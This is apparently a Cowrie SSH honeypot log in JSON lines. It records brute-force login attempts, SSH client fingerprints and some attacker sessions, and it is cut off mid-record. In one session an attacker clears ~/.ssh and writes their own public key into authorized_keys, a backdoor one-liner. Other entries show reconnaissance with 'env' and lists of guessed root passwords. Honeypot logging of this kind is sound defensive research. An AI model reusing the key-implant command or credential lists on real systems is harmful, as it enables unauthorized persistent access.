{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38870,"dst_ip":"1.2.3.4","dst_port":22,"session":"06542bb91122","protocol":"ssh","message":"New connection: 212.227.235.229:38870 (1.2.3.4:22) [session: 06542bb91122]","sensor":"my-vps","timestamp":"2025-08-31T05:49:05.686204Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:49:05.686899Z","src_ip":"212.227.235.229","session":"06542bb91122"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:49:05.971333Z","src_ip":"212.227.235.229","session":"06542bb91122"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":54494,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d88863c027e","protocol":"ssh","message":"New connection: 201.148.180.50:54494 (1.2.3.4:22) [session: 8d88863c027e]","sensor":"my-vps","timestamp":"2025-08-31T05:49:07.022606Z"}
{"eventid":"cowrie.login.success","username":"root","password":"aa11223344","message":"login attempt [root/aa11223344] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:49:07.151316Z","src_ip":"212.227.235.229","session":"06542bb91122"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:49:07.734328Z","src_ip":"212.227.235.229","session":"06542bb91122"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:49:07.735169Z","src_ip":"212.227.235.229","session":"06542bb91122"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:49:07.735919Z","src_ip":"212.227.235.229","session":"06542bb91122"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:49:07.793077Z","src_ip":"201.148.180.50","session":"8d88863c027e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:49:07.793785Z","src_ip":"201.148.180.50","session":"8d88863c027e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:49:08.021910Z","src_ip":"212.227.235.229","session":"06542bb91122"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:49:08.645949Z","src_ip":"212.227.235.229","session":"06542bb91122"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:49:08.646609Z","src_ip":"212.227.235.229","session":"06542bb91122"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:49:08.933025Z","src_ip":"212.227.235.229","session":"06542bb91122"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:49:08.933883Z","src_ip":"212.227.235.229","session":"06542bb91122"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40244,"dst_ip":"1.2.3.4","dst_port":22,"session":"003fabb378e7","protocol":"ssh","message":"New connection: 212.227.235.229:40244 (1.2.3.4:22) [session: 003fabb378e7]","sensor":"my-vps","timestamp":"2025-08-31T05:49:09.223244Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:49:09.223910Z","src_ip":"212.227.235.229","session":"003fabb378e7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:49:09.513011Z","src_ip":"212.227.235.229","session":"003fabb378e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51398,"dst_ip":"1.2.3.4","dst_port":22,"session":"34174d6cc2ef","protocol":"ssh","message":"New connection: 212.227.125.160:51398 (1.2.3.4:22) [session: 34174d6cc2ef]","sensor":"my-vps","timestamp":"2025-08-31T05:49:10.278548Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:49:10.711675Z","src_ip":"212.227.235.229","session":"003fabb378e7"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:49:12.003383Z","src_ip":"212.227.235.229","session":"003fabb378e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41574,"dst_ip":"1.2.3.4","dst_port":22,"session":"24f058172dc3","protocol":"ssh","message":"New connection: 212.227.235.229:41574 (1.2.3.4:22) [session: 24f058172dc3]","sensor":"my-vps","timestamp":"2025-08-31T05:49:12.287704Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:49:12.288648Z","src_ip":"212.227.235.229","session":"24f058172dc3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:49:12.574193Z","src_ip":"212.227.235.229","session":"24f058172dc3"}
{"eventid":"cowrie.login.success","username":"root","password":"roxy1964","message":"login attempt [root/roxy1964] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:49:12.627653Z","src_ip":"201.148.180.50","session":"8d88863c027e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:49:13.757414Z","src_ip":"212.227.235.229","session":"24f058172dc3"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:49:14.043994Z","src_ip":"212.227.235.229","session":"06542bb91122"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:49:14.045085Z","src_ip":"212.227.235.229","session":"24f058172dc3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:49:15.649385Z","src_ip":"201.148.180.50","session":"8d88863c027e"}
{"eventid":"cowrie.command.input","input":"env | head -10","message":"CMD: env | head -10","sensor":"my-vps","timestamp":"2025-08-31T05:49:15.650143Z","src_ip":"201.148.180.50","session":"8d88863c027e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","size":28,"shasum":"54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","duplicate":true,"duration":"1.7","message":"Closing TTY Log: var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:49:17.332347Z","src_ip":"201.148.180.50","session":"8d88863c027e"}
{"eventid":"cowrie.session.closed","duration":"10.3","message":"Connection lost after 10.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:49:17.333447Z","src_ip":"201.148.180.50","session":"8d88863c027e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52686,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c4d77926492","protocol":"ssh","message":"New connection: 212.227.235.229:52686 (1.2.3.4:22) [session: 9c4d77926492]","sensor":"my-vps","timestamp":"2025-08-31T05:49:23.965918Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:49:23.966808Z","src_ip":"212.227.235.229","session":"9c4d77926492"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:49:24.249303Z","src_ip":"212.227.235.229","session":"9c4d77926492"}
{"eventid":"cowrie.login.failed","username":"will","password":"will","message":"login attempt [will/will] failed","sensor":"my-vps","timestamp":"2025-08-31T05:49:25.419096Z","src_ip":"212.227.235.229","session":"9c4d77926492"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":41970,"dst_ip":"1.2.3.4","dst_port":22,"session":"522a17f75ee4","protocol":"ssh","message":"New connection: 43.159.36.188:41970 (1.2.3.4:22) [session: 522a17f75ee4]","sensor":"my-vps","timestamp":"2025-08-31T05:49:26.375663Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:49:26.376524Z","src_ip":"43.159.36.188","session":"522a17f75ee4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:49:26.621682Z","src_ip":"43.159.36.188","session":"522a17f75ee4"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:49:26.702844Z","src_ip":"212.227.235.229","session":"9c4d77926492"}
{"eventid":"cowrie.login.failed","username":"wildfly","password":"wildfly@2025","message":"login attempt [wildfly/wildfly@2025] failed","sensor":"my-vps","timestamp":"2025-08-31T05:49:27.643288Z","src_ip":"43.159.36.188","session":"522a17f75ee4"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:49:28.890710Z","src_ip":"43.159.36.188","session":"522a17f75ee4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42372,"dst_ip":"1.2.3.4","dst_port":22,"session":"b19213449a5b","protocol":"ssh","message":"New connection: 212.227.235.229:42372 (1.2.3.4:22) [session: b19213449a5b]","sensor":"my-vps","timestamp":"2025-08-31T05:49:33.855369Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:49:34.542065Z","src_ip":"212.227.235.229","session":"b19213449a5b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:49:34.542739Z","src_ip":"212.227.235.229","session":"b19213449a5b"}
{"eventid":"cowrie.login.failed","username":"test2","password":"admin123","message":"login attempt [test2/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:49:40.120399Z","src_ip":"212.227.235.229","session":"b19213449a5b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:49:40.669164Z","src_ip":"212.227.125.160","session":"34174d6cc2ef"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:49:40.670809Z","src_ip":"212.227.125.160","session":"34174d6cc2ef"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:49:41.832666Z","src_ip":"212.227.235.229","session":"b19213449a5b"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":52514,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb54ac1d8f46","protocol":"ssh","message":"New connection: 170.64.166.123:52514 (1.2.3.4:22) [session: cb54ac1d8f46]","sensor":"my-vps","timestamp":"2025-08-31T05:49:47.500618Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:49:47.501777Z","src_ip":"170.64.166.123","session":"cb54ac1d8f46"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh